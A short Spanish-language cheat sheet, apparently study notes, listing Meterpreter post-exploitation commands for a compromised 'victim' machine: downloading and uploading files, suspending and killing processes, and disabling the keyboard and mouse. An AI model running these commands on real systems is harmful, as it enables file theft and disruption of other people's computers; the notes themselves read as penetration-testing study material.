# Meterpreter 3 

## Sniffer de trafico 

Espia en la red 

Sniffer de defecto 

## Descargar archivos de la computadora atacada 

> Siempre posicionado donde esta el archivo 

```bash 
download <Archivo>
```

## Subir archivos a la victima 

```bash
upload <Archivo>
```

Se sube en la ruta en la que te encontrabas en esa maquina 

## Suspender procesos 

```bash 
suspend <PID> <PID>
```
Se pueden agregar la cantidad de proccess id que quieras 

Para volver a habilitar el proceso 
```bash
suspend -r <PID>
```

## Matar el proceso

```bash 
kill <PID
```

## Deshabilitar el teclado 

tambien se puede dehabilitar el mouse 

```bash 
uictl disable keyboard
```
